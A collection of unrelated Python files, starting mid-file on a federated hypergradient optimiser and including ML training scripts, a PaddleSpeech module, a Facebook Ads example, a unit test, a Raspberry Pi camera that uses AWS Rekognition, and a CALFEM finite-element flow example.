d_out_d_y,_=client.grad_d_out_d_y()
p_client=d_out_d_y.clone()
for _ in range(self.args.neumann):
p_client = client.hvp_iter(p_client, self.args.hlr)
hg_client = client.hyper_grad(p_client.clone())
hg = client.hyper_update(hg_client)
hg_locals.append(hg)
hg_glob=FedAvgP(hg_locals, self.args)
return hg_glob, 1
def lfed_out_svrg(self,client_locals):
hg_locals =[]
for client in client_locals:
client.hyper_iter=0
d_out_d_y,_=client.grad_d_out_d_y()
p_client=d_out_d_y.clone()
for _ in range(self.args.neumann):
p_client = client.hvp_iter(p_client, self.args.hlr)
hg_client = client.hyper_grad(p_client.clone())
hg_locals.append(hg_client)
hg_glob=FedAvgP(hg_locals, self.args)
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
h = client.hyper_svrg_update(hg_glob)
hg_locals.append(h)
hg_glob=FedAvgP(hg_locals, self.args)
return hg_glob, 2
def fed_out(self):
client_locals=[]
for idx in self.client_idx:
client= Client(self.args, idx, copy.deepcopy(self.net_glob),self.dataset, self.dict_users, self.hyper_param)
client_locals.append(client)
if self.args.hvp_method == 'seperate':
return self.lfed_out(client_locals)
if self.args.hvp_method == 'seperate_svrg':
return self.lfed_out_svrg(client_locals)
p = self.fedIHGP(client_locals)
comm_round = 1+ self.args.neumann
hg_locals =[]
for client in client_locals:
hg= client.hyper_grad(p.clone())
hg_locals.append(hg)
hg_glob=FedAvgP(hg_locals, self.args)
print(hg_glob)
comm_round+=1
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
h = client.hyper_svrg_update(hg_glob)
hg_locals.append(h)
hg_glob=FedAvgP(hg_locals, self.args)
comm_round+=1
return hg_glob, comm_round
def fed_joint(self):
print(self.client_idx)
w_glob = self.net_glob.state_dict()
if self.args.all_clients:
print("Aggregation over all clients")
w_locals = [w_glob for i in range(self.args.num_users)]
else:
w_locals=[]
loss_locals = []
grad_locals = []
client_locals = []
temp_net=copy.deepcopy(self.net_glob)
for idx in self.client_idx:
if self.args.optim == 'sgd':
client = SGDClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
elif self.args.optim == 'svrg':
client = SVRGClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
grad = client.batch_grad()
grad_locals.append(grad)
else:
raise NotImplementedError
client_locals.append(client)
if self.args.optim == 'svrg':
avg_grad = FedAvgGradient(grad_locals)
for client in client_locals:
client.set_avg_q(avg_grad)
for client in client_locals:
w, loss = client.train_epoch()
if self.args.all_clients:
w_locals[idx] = copy.deepcopy(w)
else:
w_locals.append(copy.deepcopy(w))
loss_locals.append(copy.deepcopy(loss))
# update global weights
w_glob = FedAvg(w_locals)
# copy weight to net_glob
self.net_glob.load_state_dict(w_glob)
loss_avg = sum(loss_locals) / len(loss_locals)
#return w_glob, loss_avg
if self.args.hvp_method == 'seperate':
hg_glob, comm_round = self.lfed_out(client_locals)
return w_glob, loss_avg, hg_glob, comm_round
if self.args.hvp_method == 'seperate_svrg':
hg_glob, comm_round = self.lfed_out_svrg(client_locals)
return w_glob, loss_avg, hg_glob, comm_round
else:
raise NotImplementedError
|
''' Work of Cameron Palk '''
import sys
import os.path
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
def displayAccuracyGraph( X, Y ):
# convert Y to perceptage strings
Y = [ y * 100 for y in Y ]
plt.plot( X, Y, 'bo' )
plt.title( 'Random Forest: Accuracy vs. Tree Count' )
plt.ylabel( 'Accuracy' )
plt.xlabel( 'Trees in Forest' )
plt.grid( True )
plt.show()
def printStart( n ):
print( "{} Started training {} trees".format( str( datetime.now() ), n ) )
def printStop( n ):
print( "{} Stopped training {} trees".format( str( datetime.now() ), n ) )
def main( argv ):
try:
training_filename = argv[ 1 ]
testing_filename = argv[ 2 ]
temp_filename = argv[ 3 ]
output_filename = argv[ 4 ]
except IndexError:
print( "Error, usage: \"python3 {} <training> <testing> <temp> <output>\"".format( argv[ 0 ] ) )
return
'''
Random Forest
'''
from sklearn.ensemble import RandomForestClassifier
# Hyper Parameters
max_n_estimators = 100 # default 10
temp_rows = []
if os.path.isfile( temp_filename ):
with open( temp_filename, 'r' ) as temp_stream:
temp_raw = temp_stream.read().strip()
temp_rows = temp_raw.split( '\n' ) if len( temp_raw ) > 0 else []
tree_accuracies = []
for row in temp_rows:
row_split = row.split( ':' )
tree_accuracies.append( ( int( row_split[0] ), float( row_split[1] ) ) )
start_idx = len( tree_accuracies ) + 1 # Start where our previous progress ended
if start_idx < max_n_estimators:
if start_idx > 1:
print( "Resuming progress at {:4} trees.".format( start_idx ) )
else:
print( "No progress found in temp file, starting with {:4} trees.".format( start_idx ) )
# Read training data
Training_DataFrame = pd.read_csv( training_filename )
X = Training_DataFrame.ix[:,0:-1]
Y = Training_DataFrame.ix[:,-1]
# Read testing data
Testing_DataFrame = pd.read_csv( testing_filename )
test_X = Testing_DataFrame.ix[:,0:-1]
test_Y = Testing_DataFrame.ix[:,-1]
for n_trees in range( start_idx, max_n_estimators + 1 ):
printStart( n_trees )
RF_classifier = RandomForestClassifier(
n_estimators = n_trees,
min_samples_split = 10
)
RF_classifier.fit( X, Y )
printStop( n_trees )
RF_score = RF_classifier.score( test_X, test_Y )
tree_accuracies.append( ( n_trees, RF_score ) )
# Write progress to file
with open( temp_filename, 'a' ) as temp_stream_append:
temp_stream_append.write( "{}:{}\n".format( n_trees, RF_score ) )
print( "Completed {:4} / {} trees : accuracy = {}%".format( n_trees, max_n_estimators, round( RF_score * 100, 3 ) ) )
X_labels = [ label[ 0 ] for label in tree_accuracies ]
Y_labels = [ label[ 1 ] for label in tree_accuracies ]
displayAccuracyGraph( X_labels, Y_labels )
#
if __name__=='__main__':
main( sys.argv )
|
import numpy as np
from sympy import count_ops, preorder_traversal
from sympy.parsing.sympy_parser import parse_expr
from .S_get_number_DL_snapped import get_number_DL_snapped
def get_expr_complexity(expr):
expr = parse_expr(expr)
compl = 0
is_atomic_number = lambda expr: expr.is_Atom and expr.is_number
numbers_expr = [
subexpression
for subexpression in preorder_traversal(expr)
if is_atomic_number(subexpression)
]
for j in numbers_expr:
try:
compl = compl + get_number_DL_snapped(float(j))
except:
compl = compl + 1000000
n_variables = len(expr.free_symbols)
n_operations = len(count_ops(expr, visual=True).free_symbols)
if n_operations != 0 or n_variables != 0:
compl = compl + (n_variables + n_operations) * np.log2(
(n_variables + n_operations)
)
return compl
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified from espnet(https://github.com/espnet/espnet)
"""Duration predictor related modules."""
import paddle
from paddle import nn
from paddlespeech.t2s.modules.layer_norm import LayerNorm
from paddlespeech.t2s.modules.masked_fill import masked_fill
class DurationPredictor(nn.Layer):
"""Duration predictor module.
This is a module of duration predictor described
in `FastSpeech: Fast, Robust and Controllable Text to Speech`_.
The duration predictor predicts a duration of each frame in log domain
from the hidden embeddings of encoder.
.. _`FastSpeech: Fast, Robust and Controllable Text to Speech`:
https://arxiv.org/pdf/1905.09263.pdf
Note
----------
The calculation domain of outputs is different
between in `forward` and in `inference`. In `forward`,
the outputs are calculated in log domain but in `inference`,
those are calculated in linear domain.
"""
def __init__(self,
idim,
n_layers=2,
n_chans=384,
kernel_size=3,
dropout_rate=0.1,
offset=1.0):
"""Initilize duration predictor module.
Parameters
----------
idim : int
Input dimension.
n_layers : int, optional
Number of convolutional layers.
n_chans : int, optional
Number of channels of convolutional layers.
kernel_size : int, optional
Kernel size of convolutional layers.
dropout_rate : float, optional
Dropout rate.
offset : float, optional
Offset value to avoid nan in log domain.
"""
super(DurationPredictor, self).__init__()
self.offset = offset
self.conv = nn.LayerList()
for idx in range(n_layers):
in_chans = idim if idx == 0 else n_chans
self.conv.append(
nn.Sequential(
nn.Conv1D(
in_chans,
n_chans,
kernel_size,
stride=1,
padding=(kernel_size - 1) // 2, ),
nn.ReLU(),
LayerNorm(n_chans, dim=1),
nn.Dropout(dropout_rate), ))
self.linear = nn.Linear(n_chans, 1, bias_attr=True)
def _forward(self, xs, x_masks=None, is_inference=False):
# (B, idim, Tmax)
xs = xs.transpose([0, 2, 1])
# (B, C, Tmax)
for f in self.conv:
xs = f(xs)
# NOTE: calculate in log domain
# (B, Tmax)
xs = self.linear(xs.transpose([0, 2, 1])).squeeze(-1)
if is_inference:
# NOTE: calculate in linear domain
xs = paddle.clip(paddle.round(xs.exp() - self.offset), min=0)
if x_masks is not None:
xs = masked_fill(xs, x_masks, 0.0)
return xs
def forward(self, xs, x_masks=None):
"""Calculate forward propagation.
Parameters
----------
xs : Tensor
Batch of input sequences (B, Tmax, idim).
x_masks : ByteTensor, optional
Batch of masks indicating padded part (B, Tmax).
Returns
----------
Tensor
Batch of predicted durations in log domain (B, Tmax).
"""
return self._forward(xs, x_masks, False)
def inference(self, xs, x_masks=None):
"""Inference duration.
Parameters
----------
xs : Tensor
Batch of input sequences (B, Tmax, idim).
x_masks : Tensor(bool), optional
Batch of masks indicating padded part (B, Tmax).
Returns
----------
Tensor
Batch of predicted durations in linear domain int64 (B, Tmax).
"""
return self._forward(xs, x_masks, True)
class DurationPredictorLoss(nn.Layer):
"""Loss function module for duration predictor.
The loss value is Calculated in log domain to make it Gaussian.
"""
def __init__(self, offset=1.0, reduction="mean"):
"""Initilize duration predictor loss module.
Parameters
----------
offset : float, optional
Offset value to avoid nan in log domain.
reduction : str
Reduction type in loss calculation.
"""
super(DurationPredictorLoss, self).__init__()
self.criterion = nn.MSELoss(reduction=reduction)
self.offset = offset
def forward(self, outputs, targets):
"""Calculate forward propagation.
Parameters
----------
outputs : Tensor
Batch of prediction durations in log domain (B, T)
targets : Tensor
Batch of groundtruth durations in linear domain (B, T)
Returns
----------
Tensor
Mean squared error loss value.
Note
----------
`outputs` is in log domain but `targets` is in linear domain.
"""
# NOTE: outputs is in log domain while targets in linear
targets = paddle.log(targets.cast(dtype='float32') + self.offset)
loss = self.criterion(outputs, targets)
return loss
|
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
Creates several ads using batch calls.
"""
from facebook_business import FacebookSession
from facebook_business import FacebookAdsApi
from facebook_business.objects import (
AdAccount,
Ad,
AdSet,
)
import ad_creation_utils
import json
import os
this_dir = os.path.dirname(__file__)
config_filename = os.path.join(this_dir, 'config.json')
config_file = open(config_filename)
config = json.load(config_file)
config_file.close()
### Setup session and api objects
session = FacebookSession(
config['app_id'],
config['app_secret'],
config['access_token'],
)
api = FacebookAdsApi(session)
if __name__ == '__main__':
FacebookAdsApi.set_default_api(api)
# Get my account (first account associated with the user associated with the
# session of the default api)
my_account = AdAccount.get_my_account()
#####################
# Create multiple ads
#####################
print('**** Creating multiple ads...')
# Create my ads (will use batch calling)
my_ads = ad_creation_utils.create_multiple_website_clicks_ads(
account=my_account,
name="Visit Seattle - Many Ads Experiment",
country='US',
titles=["Visit Seattle", "Seattle Tourism"],
bodies=[
"New York Alki",
"Pittsburgh of the west",
"The Queen City",
"Jet City",
"Lesser Seattle",
"The Emerald City",
"The Next City",
],
urls=["http://www.seattle.gov/visiting/"],
image_paths=[
os.path.join(
os.path.dirname(__file__),
os.pardir,
'facebook_business/test/misc/image.png'
)
],
bid_type=AdSet.BidType.cpm,
bid_info={AdSet.Field.BidInfo.impressions: 53}, # $0.53 / thousand
daily_budget=3000, # $30.00 per day
age_min=13,
age_max=65,
paused=True, # Default is False but let's keep this test ad paused
)
for ad in my_ads:
print("created ad: %s" % str(ad[Ad.Field.creative]))
# Print out api statistics
print("\nHTTP Request Statistics: %s attempted, %s succeeded." % (
api.get_num_requests_attempted(),
api.get_num_requests_succeeded(),
))
|
from unittest import TestCase
import torch
from torch.nn import CrossEntropyLoss
from loss.top_k_cross_entropy_loss import TopKCrossEntropyLoss
class TestTopKCrossEntropyLoss(TestCase):
def test_forward(self):
# Arrange
k = 2
predicted = torch.tensor([[[0.5, .5], [.7, 0.3], [0.0, 1.0]]
, [[0.2, .8], [.8, 0.2], [0.0, 1.0]]
, [[0.5, .5], [1.0, 0.0], [0.0, 1.0]]
])
target = torch.tensor([[0, 1, 0]
, [0, 1, 0]
, [0, 1, 0]
])
indices_high_loss = torch.tensor([1, 2])
expected_loss = CrossEntropyLoss()(predicted[indices_high_loss, :].permute(0, 2, 1),
target[indices_high_loss, :])
sut = TopKCrossEntropyLoss(k)
# Act
actual = sut.forward(predicted.permute(0,2,1), target)
# Assert
self.assertEqual(round(expected_loss.item(), 2), round(actual.item(), 2))
|
#!/usr/bin/python3
import boto3
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import picamera
import time
import json
from io import BytesIO
CHANGE_THRESHOLD = 0.005
SLEEP_TIME = 3
CLIENT_ID = 'pyzcam'
PUBLISH_TOPIC = CLIENT_ID + '/out'
SUBSCRIBE_TOPIC = CLIENT_ID + '/in'
AWS_IOT_ENDPOINT = '<YOUR_AWS_IOT_ENDPOINT>'
REKOGNITION_COLLECTION_ID = 'security-camera'
S3_BUCKET = '<YOUR_S3_BUCKET>'
S3_IMAGE_KEY = 'pizero/image-{}.jpg'
S3_SEEN_KEY = 'pizero/seen.json'
s3 = boto3.client('s3')
rekognition = boto3.client('rekognition')
# Create an in-memory stream
image = BytesIO()
camera = picamera.PiCamera()
# camera.start_preview()
def enable_camera():
print('Camera enabled')
use_camera.size = 0
use_camera.camera_enabled = True
def disable_camera():
print('Camera disabled')
use_camera.camera_enabled = False
def index_face(name):
print('Indexing {}...'.format(name))
take_picture(camera, image)
key=upload_image_and_get_key(image)
response=rekognition.index_faces(
CollectionId=REKOGNITION_COLLECTION_ID,
Image={
'S3Object': {
'Bucket': S3_BUCKET,
'Name': key,
}
},
ExternalImageId=name,
DetectionAttributes=['ALL']
)
print(json.dumps(response, indent=4))
def message_received(client, userdata, message):
print('Received a new message: ')
print(message.payload)
print('from topic: ')
print(message.topic)
print('--------------\n\n')
payload=json.loads(message.payload.decode('utf-8'))
if 'camera' in payload:
if payload['camera'] == 'enable':
enable_camera()
elif payload['camera'] == 'disable':
disable_camera()
elif payload['camera'] == 'use':
use_camera(once=True)
else:
print('Unknown camera state: {}'.format(payload['camera']))
elif 'index' in payload:
name=payload['index'].capitalize()
index_face(name)
else:
print('Unknown command: {}'.format(json.dumps(payload, indent=4)))
def take_picture(camera, image):
image.seek(0)
camera.capture(image, 'jpeg')
def use_camera(once=False):
take_picture(camera, image)
if not once:
previous_size=use_camera.size
use_camera.size=image.tell()
if (previous_size > 0):
size_change=abs(1 - use_camera.size / previous_size)
else:
size_change=0
print('size: {0} - previous: {1} - change: {2}'.format(use_camera.size,
previous_size, size_change))
if (once or size_change > CHANGE_THRESHOLD):
key=upload_image_and_get_key(image)
analyse_image(key)
def upload_image_and_get_key(image):
print('Uploading image to Amazon S3...')
image.seek(0)
key=S3_IMAGE_KEY.format(time.strftime('%Y%m%d%H%M%S'))
print('key = {}'.format(key))
response=s3.put_object(
Bucket=S3_BUCKET,
Key=key,
Body=image
)
print(json.dumps(response, indent=4))
return key
def upload_seen(file):
print('Uploading file to Amazon S3...')
print('key = {}'.format(S3_SEEN_KEY))
response=s3.put_object(
Bucket=S3_BUCKET,
Key=S3_SEEN_KEY,
Body=file
)
print(json.dumps(response, indent=4))
def analyse_image(key):
# Use Amazon Rekognition
print('Calling Amazon Rekognition...')
seen = {}
seen['Image'] = {
'Bucket': S3_BUCKET,
'Key': key,
}
print('Looking for labels...')
response=rekognition.detect_labels(
Image={
'S3Object': {
'Bucket': S3_BUCKET,
'Name': key,
}
},
MaxLabels=5,
MinConfidence=70,
)
seen['Labels'] = response['Labels']
print(json.dumps(seen['Labels'], indent=4))
if any('Person' in l['Name'] for l in response['Labels']):
# There is at least a person
print('Looking for faces...')
response=rekognition.detect_faces(
Image={
'S3Object': {
'Bucket': S3_BUCKET,
'Name': key,
}
},
Attributes=['ALL']
)
seen['FaceDetails'] = response['FaceDetails']
print(json.dumps(seen['FaceDetails'], indent=4))
if len(response['FaceDetails']) > 0:
# At least one face found...
print('Looking for celebrities...')
response=rekognition.recognize_celebrities(
Image={
'S3Object': {
'Bucket': S3_BUCKET,
'Name': key,
}
}
)
seen['CelebrityFaces'] = response['CelebrityFaces']
print(json.dumps(seen['CelebrityFaces'], indent=4))
print('Looking for known faces...')
response=rekognition.search_faces_by_image(
CollectionId=REKOGNITION_COLLECTION_ID,
Image={
'S3Object': {
'Bucket': S3_BUCKET,
'Name': key,
}
}
)
seen['FaceMatches'] = response['FaceMatches']
print(json.dumps(seen['FaceMatches'], indent=4))
upload_seen(json.dumps(seen))
def main():
print('Connecting to AWS IoT...')
myMQTTClient=AWSIoTMQTTClient(CLIENT_ID, useWebsocket=True)
myMQTTClient.configureCredentials('./rootCA.txt')
myMQTTClient.configureEndpoint(AWS_IOT_ENDPOINT, 443) # WebSockets
myMQTTClient.connect()
print('Publishing to AWS IoT...')
myMQTTClient.publish(PUBLISH_TOPIC, 'myPayload', 0)
print('Subscribing to AWS IoT...')
myMQTTClient.subscribe(SUBSCRIBE_TOPIC, 1, message_received)
print('Ready to Go!')
use_camera.camera_enabled = False
while True:
# Camera warm-up time
time.sleep(SLEEP_TIME)
if use_camera.camera_enabled:
use_camera()
main()
|
import pandas as pd
import numpy as np
import sys
import getopt
from sklearn import feature_extraction
from sklearn.cross_validation import StratifiedKFold
from sklearn.preprocessing import LabelEncoder
sys.path.append('/Users/ef/xgboost/wrapper')
import xgboost as xgb
import random
from sklearn.metrics import log_loss
import os
def load_train_data(path):
df = pd.read_csv(path)
X = df.values.copy()
np.random.seed(seed=2015)
np.random.shuffle(X)
X, labels, ids = X[:, 1:-1].astype(np.float32), X[:, -1], X[:, 0].astype(str)
log2FloorX = np.floor(np.log2(X + 1))
#X_col_sums = log2FloorX.sum(axis=0, keepdims=False)
#ix = [ix for ix, i in enumerate(X_col_sums) if i>0]
#log2FloorX = log2FloorX[:,ix]
#X_feats = log2FloorX.copy()
X_feats = np.append(X, log2FloorX, axis = 1)
log3FloorX = np.floor(np.divide(np.log(X + 1),np.log(3)))
X_feats = np.append(X_feats, log3FloorX, axis = 1)
log4FloorX = np.floor(np.divide(np.log(X+1),np.log(4)))
X_feats = np.append(X_feats, log4FloorX, axis = 1)
log5FloorX = np.floor(np.divide(np.log(X+1),np.log(5)))
X_feats = np.append(X_feats, log5FloorX, axis = 1)
log6FloorX = np.floor(np.divide(np.log(X+1),np.log(6)))
X_feats = np.append(X_feats, log6FloorX, axis = 1)
log7FloorX = np.floor(np.divide(np.log(X+1),np.log(7)))
X_feats = np.append(X_feats, log7FloorX, axis = 1)
log8FloorX = np.floor(np.divide(np.log(X+1),np.log(8)))
X_feats = np.append(X_feats, log8FloorX, axis = 1)
log9FloorX = np.floor(np.divide(np.log(X+1),np.log(9)))
X_feats = np.append(X_feats, log9FloorX, axis = 1)
log12FloorX = np.floor(np.divide(np.log(X+1),np.log(12)))
X_feats = np.append(X_feats, log12FloorX, axis = 1)
log13FloorX = np.floor(np.divide(np.log(X+1),np.log(13)))
X_feats = np.append(X_feats, log13FloorX, axis = 1)
logExpFloorX = np.floor(np.log(X+1))
X_feats = np.append(X_feats, logExpFloorX, axis = 1)
sqrtFloorX = np.floor(np.sqrt(X+1))
X_feats = np.append(X_feats, sqrtFloorX, axis = 1)
powX = np.power(X+1,2)
X_feats = np.append(X_feats, powX, axis = 1)
encoder = LabelEncoder()
y = encoder.fit_transform(labels).astype(np.int32)
return X_feats, y, ids, encoder
def load_test_data(path):
df = pd.read_csv(path)
X = df.values.copy()
X, ids = X[:, 1:].astype(np.float32), X[:, 0].astype(str)
log2FloorX = np.floor(np.log2(X + 1))
X_feats = np.append(X, log2FloorX, axis = 1)
log3FloorX = np.floor(np.divide(np.log(X + 1),np.log(3)))
X_feats = np.append(X_feats, log3FloorX, axis = 1)
log4FloorX = np.floor(np.divide(np.log(X+1),np.log(4)))
X_feats = np.append(X_feats, log4FloorX, axis = 1)
log5FloorX = np.floor(np.divide(np.log(X+1),np.log(5)))
X_feats = np.append(X_feats, log5FloorX, axis = 1)
log6FloorX = np.floor(np.divide(np.log(X+1),np.log(6)))
X_feats = np.append(X_feats, log6FloorX, axis = 1)
log7FloorX = np.floor(np.divide(np.log(X+1),np.log(7)))
X_feats = np.append(X_feats, log7FloorX, axis = 1)
log8FloorX = np.floor(np.divide(np.log(X+1),np.log(8)))
X_feats = np.append(X_feats, log8FloorX, axis = 1)
log9FloorX = np.floor(np.divide(np.log(X+1),np.log(9)))
X_feats = np.append(X_feats, log9FloorX, axis = 1)
log12FloorX = np.floor(np.divide(np.log(X+1),np.log(12)))
X_feats = np.append(X_feats, log12FloorX, axis = 1)
log13FloorX = np.floor(np.divide(np.log(X+1),np.log(13)))
X_feats = np.append(X_feats, log13FloorX, axis = 1)
logExpFloorX = np.floor(np.log(X+1))
X_feats = np.append(X_feats, logExpFloorX, axis = 1)
sqrtFloorX = np.floor(np.sqrt(X+1))
X_feats = np.append(X_feats, sqrtFloorX, axis = 1)
powX = np.power(X+1,2)
X_feats = np.append(X_feats, powX, axis = 1)
return X_feats, ids
def compute_fold(train_index, valid_index, X, y, X_test, ids_train, ids_test):
X_train, X_valid = X[train_index], X[valid_index]
y_train, y_valid = y[train_index], y[valid_index]
index_shuffle = [i for i in range(X_train.shape[0])]
random.shuffle(index_shuffle)
xgmat_train = xgb.DMatrix( X_train[index_shuffle,:], label=y_train[index_shuffle], missing = -999.0)
bst = xgb.train( plst, xgmat_train, num_round );
#prediction on valid
xgmat_valid = xgb.DMatrix( X_valid, missing = -999.0 )
y_pred = bst.predict( xgmat_valid )
preds_train = pd.DataFrame(y_pred, columns=['Class_'+str(i+1) for i in range(num_classes)])
preds_train['id'] = ids_train[valid_index]
preds_train['set'] = 1
#prediction on test
xgmat_test = xgb.DMatrix( X_test, missing = -999.0 )
y_pred = bst.predict( xgmat_test )
preds_test = pd.DataFrame(y_pred, columns=['Class_'+str(i+1) for i in range(num_classes)])
preds_test['id'] = ids_test
preds_test['set'] = 0
preds = preds_train.append(preds_test, ignore_index=True)
return preds
opts, args = getopt.getopt(sys.argv[1:], "t:v:p:c:f:", ["train=", "test=", "pred=", "cv=", "folds="])
opts = {x[0]:x[1] for x in opts}
train_file = opts['--train']
test_file = opts['--test']
pred_file = opts['--pred']
#epoch = int(opts['--epoch'])
epoch = 10
cv = int(opts['--cv'])
nfolds = int(opts['--folds'])
target_col = 'target'
if cv == 0:
nfolds = 2
X, y, ids_train, encoder = load_train_data(train_file)
X_test, ids_test = load_test_data(test_file)
num_classes = len(encoder.classes_)
num_features = X.shape[1]
skf = StratifiedKFold(y, nfolds, random_state=2015)
ids_train_folds = np.empty(0)
for train_index, valid_index in skf:
ids_train_folds = np.append(ids_train_folds, ids_train[valid_index])
param = {}
param['objective'] = 'multi:softprob'
param['eval_metric'] = 'mlogloss'
param['eta'] = 0.05
param['silent'] = 1
param['num_class'] = 9
param['nthread'] = 6
for e in range(epoch):
print "processing iteration", e
param['seed'] = 3015 + (10*e)
if e == 0:
param['max_depth'] = 50
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 500
if e == 1:
param['max_depth'] = 50
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.024
param['colsample_bytree'] = 1.0
num_round = 400
if e == 2:
param['max_depth'] = 30
param['min_child_weight'] = 1
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 550
if e == 3:
param['max_depth'] = 50
param['min_child_weight'] = 3
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 400
if e == 4:
param['max_depth'] = 50
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.018
param['colsample_bytree'] = 1.0
num_round = 400
if e == 5:
param['max_depth'] = 50
param['min_child_weight'] = 8
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 650
if e == 6:
param['max_depth'] = 40
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 500
if e == 7:
param['max_depth'] = 14
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.024
param['colsample_bytree'] = 1.0
num_round = 750
if e == 8:
param['max_depth'] = 14
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.036
param['colsample_bytree'] = 1.0
num_round = 650
if e == 9:
param['max_depth'] = 19
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 750
plst = list(param.items())
if cv == 0:
index_shuffle = [i for i in range(X.shape[0])]
random.shuffle(index_shuffle)
xgmat_train = xgb.DMatrix( X[index_shuffle,:], label=y[index_shuffle], missing = -999.0)
bst = xgb.train( plst, xgmat_train, num_round );
xgmat_test = xgb.DMatrix( X_test, missing = -999.0 )
preds = pd.DataFrame(bst.predict( xgmat_test ), columns=['Class_'+str(i+1) for i in range(num_classes)])
preds['id'] = ids_test
preds.to_csv('../data/output-py/test_raw/' + os.path.splitext(pred_file)[0] + '.epoch' + str(e) + '.csv', index=False)
else:
count = 0
for train_index, valid_index in skf:
print "processing fold", count+1
preds_fold = compute_fold(train_index, valid_index, X, y, X_test, ids_train, ids_test)
if count == 0:
preds = preds_fold.copy()
else:
preds = preds.append(preds_fold)
count += 1
preds.to_csv('../data/output-py/train_raw/' + os.path.splitext(pred_file)[0] + '.epoch' + str(e) + '.csv', index=False)
|
# -*- coding: utf-8 -*-
#
# example exm0_mpl.py
# ----------------------------------------------------------------
# PURPOSE
# Setup a finite element flow model using the mesh functions
# in CALFEM.
# ----------------------------------------------------------------
#
# REFERENCES
# J Lindemann 2021-12-29
# ----------------------------------------------------------------
# ----- Import needed modules ------------------------------------
import numpy as np
import calfem.core as cfc
import calfem.geometry as cfg
import calfem.mesh as cfm
import calfem.vis_mpl as cfv
import calfem.utils as cfu
# ----- Problem parameters ---------------------------------------
w = 100.0
h = 10.0
t = 1.0
d = h/2
D = np.identity(2, 'float')
ep = [1.0, 1]
# ----- Create geometry object -----------------------------------
g = cfg.Geometry()
g.point([0, 0]) # point 1
g.point([w, 0]) # point 2
g.point([w, h]) # point 3
g.point([w-w/2+t/2, h]) # point 4
g.point([w-w/2+t/2, h-d]) # point 5
g.point([w-w/2-t/2, h-d]) # point 6
g.point([w-w/2-t/2, h]) # point 7
g.point([0, h]) # point 8
# ----- Create lines between points ------------------------------
left_side = 80
right_side = 90
g.spline([0, 1])
g.spline([1, 2])
g.spline([2, 3], marker=left_side) # marker just to name
g.spline([3, 4])
g.spline([4, 5])
g.spline([5, 6])
g.spline([6, 7], marker=right_side)
g.spline([7, 0])
# ----- Make surface area ----------------------------------------
g.surface([0, 1, 2, 3, 4, 5, 6, 7])
# ----- Mesh generation ------------------------------------------
el_type = 3 # quadrature element
dofs_per_node = 1 # 1 dof
# ----- Set mesh paramters ---------------------------------------
mesh = cfm.GmshMesh(g)
mesh.el_size_factor = 1.0
mesh.el_type = el_type
mesh.dofs_per_node = dofs_per_node
# ----- Create mesh ----------------------------------------------
coords, edof, dofs, bdofs, elementmarkers = mesh.create()
# ----- Assemble elements ----------------------------------------
nDofs = np.size(dofs)
ex, ey = cfc.coordxtr(edof, coords, dofs)
K = np.zeros([nDofs, nDofs])
for eltopo, elx, ely, in zip(edof, ex, ey):
Ke = cfc.flw2i4e(elx, ely, ep, D)
cfc.assem(eltopo, K, Ke)
# ----- Force vector ---------------------------------------------
f = np.zeros([nDofs, 1])
# ----- Boundary conditions --------------------------------------
bc = np.array([], int)
bcVal = np.array([], int)
bc, bcVal = cfu.applybc(bdofs, bc, bcVal, left_side, 0.0)
bc, bcVal = cfu.applybc(bdofs, bc, bcVal, right_side, 10.0)
# ----- Solve equation system ------------------------------------
a, r = cfc.solveq(K, f, bc, bcVal)
ed = cfc.extractEldisp(edof, a)
# ----- Calculating element forces -------------------------------
maxFlow = [] # empty list to store flow
for i in range(edof.shape[0]):
es, et, eci = cfc.flw2i4s(ex[i, :], ey[i, :], ep, D, ed[i, :])
maxFlow.append(np.sqrt(pow(es[0, 0], 2) + pow(es[0, 1], 2)))
# ----- Visualize results ----------------------------------------
cfv.figure()
cfv.draw_geometry(g, title='Geometry')
cfv.figure()
cfv.draw_element_values(maxFlow, coords, edof, dofs_per_node, el_type, None,
title='Max flows')
cfv.figure()
cfv.draw_nodal_values(a, coords, edof,
dofs_per_node=dofs_per_node,
el_type=el_type)
